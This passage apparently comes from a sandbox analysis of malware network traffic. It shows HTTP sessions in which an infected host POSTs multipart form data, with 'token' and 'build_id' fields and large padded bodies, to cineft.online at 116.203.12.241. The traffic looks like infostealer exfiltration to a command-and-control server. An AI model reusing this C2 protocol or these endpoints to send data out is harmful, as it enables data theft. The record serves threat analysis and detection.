41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 23:00:01 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 23:00:01 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 23:00:01 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 23:00:01 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 23:00:01 UTC	6186	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 23:00:03 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 23:00:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
46	192.168.2.4	50158	116.203.12.241	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 23:00:02 UTC	328	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----6PZCBASJEKFU3ECBA1N7 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: cineft.online Content-Length: 393697 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 23:00:02 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 36 50 5a 43 42 41 53 4a 45 4b 46 55 33 45 43 42 41 31 4e 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 32 61 30 30 65 33 39 32 64 34 33 38 33 66 61 66 30 31 35 35 36 62 39 62 65 65 62 66 38 32 0d 0a 2d 2d 2d 2d 2d 2d 36 50 5a 43 42 41 53 4a 45 4b 46 55 33 45 43 42 41 31 4e 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 36 50 5a 43 42 41 53 4a 45 4b 46 55 33 45 43 42 41 31 4e 37 0d 0a 43 6f 6e 74 Data Ascii: ------6PZCBASJEKFU3ECBA1N7Content-Disposition: form-data; name="token"232a00e392d4383faf01556b9beebf82------6PZCBASJEKFU3ECBA1N7Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------6PZCBASJEKFU3ECBA1N7Cont
2024-12-14 23:00:02 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 23:00:02 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 23:00:02 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 23:00:02 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 23:00:02 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 23:00:02 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 23:00:02 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 23:00:02 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 23:00:02 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 23:00:04 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 23:00:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
47	192.168.2.4	50160	116.203.12.241	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 23:00:05 UTC	328	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BASRIWLNYCBIEUAAI5F3 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: cineft.online Content-Length: 131557 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 23:00:05 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 41 53 52 49 57 4c 4e 59 43 42 49 45 55 41 41 49 35 46 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 32 61 30 30 65 33 39 32 64 34 33 38 33 66 61 66 30 31 35 35 36 62 39 62 65 65 62 66 38 32 0d 0a 2d 2d 2d 2d 2d 2d 42 41 53 52 49 57 4c 4e 59 43 42 49 45 55 41 41 49 35 46 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 42 41 53 52 49 57 4c 4e 59 43 42 49 45 55 41 41 49 35 46 33 0d 0a 43 6f 6e 74 Data Ascii: ------BASRIWLNYCBIEUAAI5F3Content-Disposition: form-data; name="token"232a00e392d4383faf01556b9beebf82------BASRIWLNYCBIEUAAI5F3Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------BASRIWLNYCBIEUAAI5F3Cont
2024-12-14 23:00:05 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
